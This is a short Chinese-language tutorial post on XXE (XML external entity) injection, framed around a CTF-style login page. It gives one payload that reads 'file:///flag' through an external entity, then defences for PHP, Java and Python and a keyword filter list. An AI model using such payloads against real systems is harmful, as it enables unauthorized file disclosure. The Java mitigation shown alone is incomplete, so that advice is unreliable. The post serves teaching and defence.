XXE漏洞利用
簡介:
XXE就是XML外部物體注入,當允許參考外部物體時,通過構造惡意內容,就可能導致任意檔案讀取、系統命令執行、內網埠探測、攻擊內網網站等危害,
環境搭建:
采用在線環境 地址
漏洞復現:
登錄頁面
XXE插入陳述句
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [<!ENTITY xxe SYSTEM "file:///flag"> ]>
<user><username>&xxe;</username><password>admin</password></user>
只能為一個回車
漏洞防御:
a. 使用開發語言提供的禁用外部物體的方法
PHP:
libxml_disable_entity_loader(true);
JAVA:
DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);
Python:
from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))
b. 過濾用戶提交的XML資料
關鍵詞:<!DOCTYPE和<!ENTITY,或者,SYSTEM和PUBLIC,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/387781.html
標籤:其他